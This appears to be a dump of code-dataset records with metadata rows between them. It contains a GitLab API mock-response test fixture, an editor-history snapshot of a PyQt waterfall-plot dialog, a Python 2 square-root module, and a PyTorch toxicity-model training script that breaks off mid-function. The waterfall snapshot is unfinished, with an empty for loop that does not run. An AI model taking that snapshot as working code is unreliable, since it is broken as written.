'"lfs_enabled": true, "avatar_url": "http://localhost:3000/uploads/group/avatar/1/foo.jpg",'
'"web_url": "http://localhost:3000/groups/foo-bar", "request_access_enabled": false,'
'"full_name": "Foobar Group", "full_path": "foo-bar",'
'"file_template_project_id": 1, "parent_id": null, "projects": []}, {"id": 2, "name": "BarFoo Group", "path": "bar-foor",'
'"description": "An interesting group", "visibility": "public",'
'"lfs_enabled": true, "avatar_url": "http://localhost:3000/uploads/group/avatar/2/bar.jpg",'
'"web_url": "http://localhost:3000/groups/bar-foo", "request_access_enabled": false,'
'"full_name": "BarFoo Group", "full_path": "bar-foo",'
'"file_template_project_id": 1, "parent_id": null, "projects": []}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1", method="get")
def resp_get_group(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1, "name": "Foobar Group", "path": "foo-bar",'
'"description": "An interesting group", "visibility": "public",'
'"lfs_enabled": true, "avatar_url": "http://localhost:3000/uploads/group/avatar/1/foo.jpg",'
'"web_url": "http://localhost:3000/groups/foo-bar", "request_access_enabled": false,'
'"full_name": "Foobar Group", "full_path": "foo-bar",'
'"file_template_project_id": 1, "parent_id": null, "projects": [{"id": 1,"description": null, "default_branch": "master",'
'"ssh_url_to_repo": "git@example.com:diaspora/diaspora-client.git",'
'"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
'"web_url": "http://example.com/diaspora/diaspora-client",'
'"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
'"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
'"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
'"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
'"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
'"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
'"star_count": 0}]}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1", method="get")
def resp_get_missing_group(url, request):
headers = {'content-type': 'application/json'}
content = ('{}')
content = content.encode("utf-8")
return response(404, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups", method="post")
def resp_create_group(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1, "name": "Foobar Group", "path": "foo-bar",'
'"description": "An interesting group", "visibility": "public",'
'"lfs_enabled": true, "avatar_url": "http://localhost:3000/uploads/group/avatar/1/foo.jpg",'
'"web_url": "http://localhost:3000/groups/foo-bar", "request_access_enabled": false,'
'"full_name": "Foobar Group", "full_path": "foo-bar",'
'"file_template_project_id": 1, "parent_id": null}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups", method="post")
def resp_create_subgroup(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 2, "name": "BarFoo Group", "path": "bar-foor",'
'"description": "An interesting group", "visibility": "public",'
'"lfs_enabled": true, "avatar_url": "http://localhost:3000/uploads/group/avatar/2/bar.jpg",'
'"web_url": "http://localhost:3000/groups/foo-bar/bar-foo", "request_access_enabled": false,'
'"full_name": "BarFoo Group", "full_path": "foo-bar/bar-foo",'
'"file_template_project_id": 1, "parent_id": 1}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1", method="delete")
def resp_delete_group(url, request):
headers = {'content-type': 'application/json'}
content = ('{}')
content = content.encode("utf-8")
return response(204, content, headers, None, 5, request)
'''
GROUP MEMBER API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/members/1", method="get")
def resp_get_member(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1, "username": "raymond_smith", "name": "Raymond Smith", "state": "active",'
'"avatar_url": "https://www.gravatar.com/avatar/c2525a7f58ae3776070e44c106c48e15?s=80&d=identicon",'
'"web_url": "http://192.168.1.8:3000/root", "expires_at": "2012-10-22T14:13:35Z", "access_level": 30}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/members", method="get")
def resp_find_member(url, request):
headers = {'content-type': 'application/json'}
content = ('[{"id": 1, "username": "raymond_smith", "name": "Raymond Smith", "state": "active",'
'"avatar_url": "https://www.gravatar.com/avatar/c2525a7f58ae3776070e44c106c48e15?s=80&d=identicon",'
'"web_url": "http://192.168.1.8:3000/root", "expires_at": "2012-10-22T14:13:35Z", "access_level": 30},{'
'"id": 2, "username": "john_doe", "name": "John Doe","state": "active",'
'"avatar_url": "https://www.gravatar.com/avatar/c2525a7f58ae3776070e44c106c48e15?s=80&d=identicon",'
'"web_url": "http://192.168.1.8:3000/root","expires_at": "2012-10-22T14:13:35Z",'
'"access_level": 30}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/members", method="post")
def resp_add_member(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1, "username": "raymond_smith", "name": "Raymond Smith",'
'"state": "active",'
'"avatar_url": "https://www.gravatar.com/avatar/c2525a7f58ae3776070e44c106c48e15?s=80&d=identicon",'
'"web_url": "http://192.168.1.8:3000/root", "expires_at": "2012-10-22T14:13:35Z",'
'"access_level": 30}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/members/1", method="put")
def resp_update_member(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1, "username": "raymond_smith", "name": "Raymond Smith",'
'"state": "active",'
'"avatar_url": "https://www.gravatar.com/avatar/c2525a7f58ae3776070e44c106c48e15?s=80&d=identicon",'
'"web_url": "http://192.168.1.8:3000/root", "expires_at": "2012-10-22T14:13:35Z",'
'"access_level": 10}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
'''
DEPLOY KEY API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/deploy_keys", method="get")
def resp_find_project_deploy_key(url, request):
headers = {'content-type': 'application/json'}
content = ('[{"id": 1,"title": "Public key",'
'"key": "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAiPWx6WM4lhHNedGfBpPJNPpZ7yKu+dnn1SJejgt4596k6YjzGGphH2TUxwKzxc'
'KDKKezwkpfnxPkSMkuEspGRt/aZZ9wa++Oi7Qkr8prgHc4soW6NUlfDzpvZK2H5E7eQaSeP3SAwGmQKUFHCddNaP0L+hM7zhFNzjFvpaMgJw0=",'
'"created_at": "2013-10-02T10:12:29Z"},{"id": 3,"title": "Another Public key",'
'"key": "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAiPWx6WM4lhHNedGfBpPJNPpZ7yKu+dnn1SJejgt4596k6YjzGGphH2TUxwKzxc'
'KDKKezwkpfnxPkSMkuEspGRt/aZZ9wa++Oi7Qkr8prgHc4soW6NUlfDzpvZK2H5E7eQaSeP3SAwGmQKUFHCddNaP0L+hM7zhFNzjFvpaMgJw0=",'
'"created_at": "2013-10-02T11:12:29Z"}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/deploy_keys/1", method="get")
def resp_get_project_deploy_key(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1,"title": "Public key",'
'"key": "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAiPWx6WM4lhHNedGfBpPJNPpZ7yKu+dnn1SJejgt4596k6YjzGGphH2TUxwKzxc'
'KDKKezwkpfnxPkSMkuEspGRt/aZZ9wa++Oi7Qkr8prgHc4soW6NUlfDzpvZK2H5E7eQaSeP3SAwGmQKUFHCddNaP0L+hM7zhFNzjFvpaMgJw0=",'
'"created_at": "2013-10-02T10:12:29Z"}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/deploy_keys", method="post")
def resp_create_project_deploy_key(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1,"title": "Public key",'
'"key": "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAiPWx6WM4lhHNedGfBpPJNPpZ7yKu+dnn1SJejgt4596k6YjzGGphH2TUxwKzxc'
'KDKKezwkpfnxPkSMkuEspGRt/aZZ9wa++Oi7Qkr8prgHc4soW6NUlfDzpvZK2H5E7eQaSeP3SAwGmQKUFHCddNaP0L+hM7zhFNzjFvpaMgJw0=",'
'"created_at": "2013-10-02T10:12:29Z"}')
content = content.encode("utf-8")
return response(201, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/deploy_keys/1", method="delete")
def resp_delete_project_deploy_key(url, request):
headers = {'content-type': 'application/json'}
content = ('{}')
content = content.encode("utf-8")
return response(204, content, headers, None, 5, request)
'''
PROJECT API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects", method="get")
def resp_find_project(url, request):
headers = {'content-type': 'application/json'}
content = ('[{"id": 1,"description": null, "default_branch": "master",'
'"ssh_url_to_repo": "git@example.com:diaspora/diaspora-client.git",'
'"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
'"web_url": "http://example.com/diaspora/diaspora-client",'
'"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
'"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
'"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
'"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
'"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
'"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
'"star_count": 0}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1", method="get")
def resp_get_project(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1,"description": null, "default_branch": "master",'
'"ssh_url_to_repo": "git@example.com:diaspora/diaspora-client.git",'
'"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
'"web_url": "http://example.com/diaspora/diaspora-client",'
'"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
'"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
'"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
'"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
'"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
'"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
'"star_count": 0}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/foo-bar%2Fdiaspora-client", method="get")
def resp_get_project_by_name(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1,"description": null, "default_branch": "master",'
'"ssh_url_to_repo": "git@example.com:diaspora/diaspora-client.git",'
'"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
'"web_url": "http://example.com/diaspora/diaspora-client",'
'"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
'"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
'"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
'"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
'"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
'"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
'"star_count": 0}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/projects", method="get")
def resp_find_group_project(url, request):
headers = {'content-type': 'application/json'}
content = ('[{"id": 1,"description": null, "default_branch": "master",'
'"ssh_url_to_repo": "git@example.com:diaspora/diaspora-client.git",'
'"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
'"web_url": "http://example.com/diaspora/diaspora-client",'
'"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
'"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
'"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
'"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
'"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
'"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
'"star_count": 0}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/projects/1", method="get")
def resp_get_group_project(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1,"description": null, "default_branch": "master",'
'"ssh_url_to_repo": "git@example.com:diaspora/diaspora-client.git",'
'"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
'"web_url": "http://example.com/diaspora/diaspora-client",'
'"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
'"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
'"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
'"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
'"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
'"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
'"star_count": 0}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects", method="post")
def resp_create_project(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1,"description": null, "default_branch": "master",'
'"ssh_url_to_repo": "git@example.com:diaspora/diaspora-client.git",'
'"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
'"web_url": "http://example.com/diaspora/diaspora-client",'
'"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
'"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
'"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
'"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
'"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
'"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
'"star_count": 0}')
content = content.encode("utf-8")
return response(201, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1", method="delete")
def resp_delete_project(url, request):
headers = {'content-type': 'application/json'}
content = ('{}')
content = content.encode("utf-8")
return response(204, content, headers, None, 5, request)
'''
HOOK API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/hooks", method="get")
def resp_find_project_hook(url, request):
headers = {'content-type': 'application/json'}
content = ('[{"id": 1,"url": "http://example.com/hook","project_id": 3,'
'"push_events": true,"push_events_branch_filter": "","issues_events": true,'
'"confidential_issues_events": true,"merge_requests_events": true,'
'"tag_push_events": true,"note_events": true,"job_events": true,'
'"pipeline_events": true,"wiki_page_events": true,"enable_ssl_verification": true,'
'"created_at": "2012-10-12T17:04:47Z"}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/hooks/1", method="get")
def resp_get_project_hook(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1,"url": "http://example.com/hook","project_id": 3,'
'"push_events": true,"push_events_branch_filter": "","issues_events": true,'
'"confidential_issues_events": true,"merge_requests_events": true,'
'"tag_push_events": true,"note_events": true,"job_events": true,'
'"pipeline_events": true,"wiki_page_events": true,"enable_ssl_verification": true,'
'"created_at": "2012-10-12T17:04:47Z"}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/hooks", method="post")
def resp_create_project_hook(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1,"url": "http://example.com/hook","project_id": 3,'
'"push_events": true,"push_events_branch_filter": "","issues_events": true,'
'"confidential_issues_events": true,"merge_requests_events": true,'
'"tag_push_events": true,"note_events": true,"job_events": true,'
'"pipeline_events": true,"wiki_page_events": true,"enable_ssl_verification": true,'
'"created_at": "2012-10-12T17:04:47Z"}')
content = content.encode("utf-8")
return response(201, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/hooks/1", method="delete")
def resp_delete_project_hook(url, request):
headers = {'content-type': 'application/json'}
content = ('{}')
content = content.encode("utf-8")
return response(204, content, headers, None, 5, request)
'''
RUNNER API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/runners/all", method="get")
def resp_find_runners_all(url, request):
headers = {'content-type': 'application/json'}
content = ('[{"active": true,"description": "test-1-20150125","id": 1,'
'"is_shared": false,"ip_address": "127.0.0.1","name": null,'
'"online": true,"status": "online"},{"active": true,'
'"description": "test-2-20150125","id": 2,"ip_address": "127.0.0.1",'
'"is_shared": false,"name": null,"online": false,"status": "offline"}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/runners", method="get")
def resp_find_runners_list(url, request):
headers = {'content-type': 'application/json',
"X-Page": 1,
"X-Next-Page": 2,
"X-Per-Page": 1,
"X-Total-Pages": 1,
"X-Total": 2}
content = ('[{"active": true,"description": "test-1-20150125","id": 1,'
'"is_shared": false,"ip_address": "127.0.0.1","name": null,'
'"online": true,"status": "online"},{"active": true,'
'"description": "test-2-20150125","id": 2,"ip_address": "127.0.0.1",'
'"is_shared": false,"name": null,"online": false,"status": "offline"}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/runners/1", method="get")
def resp_get_runner(url, request):
headers = {'content-type': 'application/json'}
content = ('{"active": true,"description": "test-1-20150125","id": 1,'
'"is_shared": false,"ip_address": "127.0.0.1","name": null,'
'"online": true,"status": "online"}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/runners", method="post")
def resp_create_runner(url, request):
headers = {'content-type': 'application/json'}
content = ('{"active": true,"description": "test-1-20150125","id": 1,'
'"is_shared": false,"ip_address": "127.0.0.1","name": null,'
'"online": true,"status": "online"}')
content = content.encode("utf-8")
return response(201, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/runners/1", method="delete")
def resp_delete_runner(url, request):
headers = {'content-type': 'application/json'}
content = ('{}')
content = content.encode("utf-8")
return response(204, content, headers, None, 5, request)
| [
"joshuamadison+gh@gmail.com"
] | joshuamadison+gh@gmail.com |
f7160dd06a6cbc907cf9333e3f2cc9eed3e33370 | 3365e4d4fc67bbefe4e8c755af289c535437c6f4 | /.history/src/core/dialogs/waterfall_dialog_20170814160354.py | 48b7fc0363101051bbb0b422d90056e63e785730 | [] | no_license | kiranhegde/OncoPlotter | f3ab9cdf193e87c7be78b16501ad295ac8f7d2f1 | b79ac6aa9c6c2ca8173bc8992ba3230aa3880636 | refs/heads/master | 2021-05-21T16:23:45.087035 | 2017-09-07T01:13:16 | 2017-09-07T01:13:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,510 | py | '''
Refs:
Embedding plot: https://sukhbinder.wordpress.com/2013/12/16/simple-pyqt-and-matplotlib-example-with-zoompan/
'''
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar
import matplotlib.pyplot as plt
from PyQt5.QtWidgets import (QHeaderView, QApplication, QDialog, QWidget, QPushButton, QVBoxLayout, QTreeWidget, QTreeWidgetItem, QComboBox)
from PyQt5 import QtCore, QtGui
import core.gui.waterfall as waterfall
import numpy as np
from pprint import pprint
class CustomCombo(QComboBox):
def __init__(self,parent,bar_keys_colors):
super(QComboBox,self).__init__(parent)
#keys is a dictionary: {'key description':color,...}
self.keys = list(bar_keys_colors.keys())
def populate(self):
'''Override method to add items to list'''
for key in self.keys:
class Waterfall(QWidget, waterfall.Ui_Waterfall):
general_settings_signal = QtCore.pyqtSignal(list) #send list of plotting params
updated_rectangles_signal = QtCore.pyqtSignal(list) #send list of updated artists for redrawing
def __init__(self, parent):
super(Waterfall,self).__init__(parent)
self.setupUi(self)
#Button functions
self.btn_apply_general_settings.clicked.connect(self.send_settings)
self.patient_tree = self.create_patient_tree()
self.data_viewer_container.addWidget(self.patient_tree)
def on_waterfall_data_signal(self,signal):
self.waterfall_data = signal['waterfall_data'] #pandas dataframe
def on_generated_rectangles_signal(self,signal):
self.rectangles_received = signal[0]
self.add_items() #display in table
#print(self.rectangles_received)
def send_settings(self,signal):
self.list_general_settings = [
self.plot_title.text(),
self.x_label.text(),
self.y_label.text(),
self.twenty_percent_line.isChecked(),
self.thirty_percent_line.isChecked(),
self.zero_percent_line.isChecked(),
self.display_responses_as_text.isChecked()
]
self.general_settings_signal.emit(self.list_general_settings)
def create_patient_tree(self):
'''
Create QTreeWidget populated with a patient's data for the DataEntry dialog.
Assumes that self.temp_patient is the patient of interest and that the variable belongs to the dialog.
'''
self.tree = QTreeWidget()
self.root = self.tree.invisibleRootItem()
self.headers = [
'Patient #',
'Best response %',
'Overall response',
'Cancer',
'Color coding key',
]
self.headers_item = QTreeWidgetItem(self.headers)
self.tree.setColumnCount(len(self.headers))
self.tree.setHeaderItem(self.headers_item)
self.root.setExpanded(True)
self.tree.header().setSectionResizeMode(QHeaderView.ResizeToContents)
self.tree.header().setStretchLastSection(False)
return self.tree
def add_items(self):
'''
Populate viewing tree
'''
self.tree.clear() #clear prior to entering items, prevent aggregation
i=0
for rect in self.rectangles_received:
#populate editable tree with rect data
self.rect_item = QTreeWidgetItem(self.root)
self.rect_params = [
self.waterfall_data['Patient number'][i],
rect.get_height(),
self.waterfall_data['Overall response'][i],
self.waterfall_data['Cancer'][i]
]
for col in range(0,4):
self.rect_item.setText(col,str(self.rect_params[col]))
self.rect_item.setTextAlignment(col,4)
self.tree.setItemWidget(self.rect_item, 4, QComboBox())
self.rect_item.setFlags(self.rect_item.flags() | QtCore.Qt.ItemIsEditable)
i+=1
def on_updated_tree_item(self):
#update the rectangle which was edited
pass
class WaterfallPlotter(QWidget):
generated_rectangles_signal = QtCore.pyqtSignal(list) #send list of rects for data display in tree
def __init__(self,parent):
super(WaterfallPlotter,self).__init__(parent)
self.figure = plt.figure()
self.canvas = FigureCanvas(self.figure)
self.toolbar = NavigationToolbar(self.canvas,self)
self.btn_plot = QPushButton('Default Plot')
self.btn_plot.clicked.connect(self.default_plot)
self.layout = QVBoxLayout()
self.layout.addWidget(self.toolbar)
self.layout.addWidget(self.canvas)
self.layout.addWidget(self.btn_plot)
self.setLayout(self.layout)
def on_waterfall_data_signal(self,signal):
self.waterfall_data = signal['waterfall_data'] #pandas dataframe
self.btn_plot.setEnabled(True)
def on_general_settings_signal(self,signal):
try:
hasattr(self,'ax')
self.ax.set_title(signal[0])
self.ax.set_xlabel(signal[1])
self.ax.set_ylabel(signal[2])
self.canvas.draw()
except Exception as e:
print(e)
def default_plot(self):
'''
Plot waterfall data
'''
self.figure.clear()
self.rect_locations = np.arange(len(self.waterfall_data['Best response percent change']))
self.ax = self.figure.add_subplot(111)
self.ax.axhline(y=20, linestyle='--', c='k', alpha=0.5, lw=2.0, label='twenty_percent')
self.ax.axhline(y=-30, linestyle='--', c='k', alpha=0.5, lw=2.0, label='thirty_percent')
self.ax.axhline(y=0, c='k', alpha=1, lw=2.0, label='zero_percent')
self.ax.grid(color = 'k', axis = 'y', alpha=0.25)
self.rects = self.ax.bar(self.rect_locations,self.waterfall_data['Best response percent change'])
self.auto_label_responses(self.ax, self.rects, self.waterfall_data)
#self.plot_table()
self.canvas.draw()
self.ax.hold(False) #rewrite the plot when plot() called
self.generated_rectangles_signal.emit([self.rects])
def plot_table(self):
rows = ['%s' % x for x in self.waterfall_data.keys()]
rows = rows[4:] #skip first three, they are the 4 standard headers, rest are table rows
columns = self.waterfall_data['Patient number'] #patient numbers
cell_text = []
for row in rows:
cell_text_temp = []
for col in range(len(columns)):
cell_text_temp.append(self.waterfall_data[row][col])
cell_text.append(cell_text_temp)
the_table = plt.table(cellText=cell_text, rowLabels=rows, colLabels=columns, loc='bottom', cellLoc='center')
plt.subplots_adjust(bottom=0.15,left=0.5)
self.ax.set_xlim(-0.5,len(columns)-0.5)
plt.tick_params(
axis='x', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom='off', # ticks along the bottom edge are off
top='off', # ticks along the top edge are off
labelbottom='off'
) # labels along the bottom edge are off
def update_plot(self):
'''
TODO
'''
pass
def auto_label_responses(self, ax, rects, waterfall_data):
'''Add labels above/below bars'''
i = 0
for rect in rects:
height = rect.get_height()
if height >= 0:
valign = 'bottom'
else:
valign = 'top'
ax.text(rect.get_x() + rect.get_width()/2., height,
'%s' % waterfall_data['Overall response'][i], ha='center', va=valign)
i+=1
| [
"ngoyal95@terpmail.umd.edu"
] | ngoyal95@terpmail.umd.edu |
7710a9642e9f3d373a1295f5cfb9c1067f40da35 | be4892e723db5039c56f961e117cb95258168eca | /lectures/lecture6/mysqrt.py | 6c1b85a74369b42e6707344be08f3d44fe3a4d16 | [] | no_license | Physicist91/uwhpsc | 121ebef0d0cd9fd7b038f97b4cb93a1f2272844a | d3ce5217796c82b19c131a04d7aecad1b9c4bae2 | refs/heads/master | 2021-01-10T21:12:00.235642 | 2014-04-05T23:29:07 | 2014-04-05T23:29:07 | 19,096,883 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,195 | py | """
Module for approximating sqrt.
This is a sample module developed in earlier lectures.
"""
def sqrt2(x, debug=False):
"""
more details.
"""
from numpy import nan
if x==0.:
return 0.
elif x<0:
print "*** Error, x must be nonnegative"
return nan
assert x>0. and type(x) is float, "Unrecognized input"
s = 1.
kmax = 100
tol = 1.e-14
for k in range(kmax):
if debug:
print "Before iteration %s, s = %20.15f" % (k,s)
s0 = s
s = 0.5 * (s + x/s)
delta_s = s - s0
if abs(delta_s / x) < tol:
break
if debug:
print "After %s iterations, s = %20.15f" % (k+1,s)
return s
def test():
from numpy import sqrt
xvalues = [0., 2., 100., 10000., 1.e-4]
for x in xvalues:
print "Testing with x = %20.15e" % x
s = sqrt2(x)
s_numpy = sqrt(x)
print " s = %20.15e, numpy.sqrt = %20.15e" \
% (s, s_numpy)
assert abs(s - s_numpy) < 1e-14, \
"Disagree for x = %20.15e" % x
if __name__ == "__main__":
print "Running test... "
test()
| [
"rjl@ned"
] | rjl@ned |
c800444c8660c118459576653ce9354ba013b186 | 696972c107ba96341875bab03dbb92e9337e2924 | /train_pytorch/train42_architecture.py | ff12674e510873c287c3c17c1bd6a7dd7eb26edd | [] | no_license | Dongfeng-He/nb | 577d3d5a5f0ec585f132946eb9b6475f6e6856bb | 1d65be2f98a72ae1bd58363bba42b5f1e8e7ac49 | refs/heads/master | 2020-05-29T15:37:29.882797 | 2019-08-09T02:11:25 | 2019-08-09T02:11:25 | 189,225,420 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 29,777 | py | import os
import pandas as pd
import random
import copy
from keras.preprocessing import text, sequence
import torch
from torch import nn
from torch.utils import data
from torch.nn import functional as F
import numpy as np
import time
import math
import gc
from sklearn.metrics import roc_auc_score
class JigsawEvaluator:
def __init__(self, y_true, y_identity, power=-5, overall_model_weight=0.25):
self.y = (y_true >= 0.5).astype(int)
self.y_i = (y_identity >= 0.5).astype(int)
self.n_subgroups = self.y_i.shape[1]
self.power = power
self.overall_model_weight = overall_model_weight
@staticmethod
def _compute_auc(y_true, y_pred):
try:
return roc_auc_score(y_true, y_pred)
except ValueError:
return np.nan
def _compute_subgroup_auc(self, i, y_pred):
mask = self.y_i[:, i] == 1
return self._compute_auc(self.y[mask], y_pred[mask])
def _compute_bpsn_auc(self, i, y_pred):
mask = self.y_i[:, i] + self.y == 1
return self._compute_auc(self.y[mask], y_pred[mask])
def _compute_bnsp_auc(self, i, y_pred):
mask = self.y_i[:, i] + self.y != 1
return self._compute_auc(self.y[mask], y_pred[mask])
def compute_bias_metrics_for_model(self, y_pred):
records = np.zeros((3, self.n_subgroups))
for i in range(self.n_subgroups):
records[0, i] = self._compute_subgroup_auc(i, y_pred)
records[1, i] = self._compute_bpsn_auc(i, y_pred)
records[2, i] = self._compute_bnsp_auc(i, y_pred)
return records
def _calculate_overall_auc(self, y_pred):
return roc_auc_score(self.y, y_pred)
def _power_mean(self, array):
total = sum(np.power(array, self.power))
return np.power(total / len(array), 1 / self.power)
def get_final_metric(self, y_pred):
bias_metrics = self.compute_bias_metrics_for_model(y_pred)
bias_score = np.average([
self._power_mean(bias_metrics[0]),
self._power_mean(bias_metrics[1]),
self._power_mean(bias_metrics[2])
])
overall_score = self.overall_model_weight * self._calculate_overall_auc(y_pred)
bias_score = (1 - self.overall_model_weight) * bias_score
return overall_score + bias_score
class FocalLoss(nn.Module):
def __init__(self, alpha=1, gamma=2, logits=True, reduce=False):
super(FocalLoss, self).__init__()
self.alpha = alpha
self.gamma = gamma
self.logits = logits
self.reduce = reduce
def forward(self, inputs, targets):
if self.logits:
bce_loss = nn.BCEWithLogitsLoss(reduction="none")(inputs, targets)
else:
bce_loss = nn.BCELoss(reduction="none")(inputs, targets)
pt = torch.exp(-bce_loss)
focal_loss = self.alpha * (1-pt)**self.gamma * bce_loss
#focal_loss = (1 - pt) ** self.gamma * bce_loss
if self.reduce:
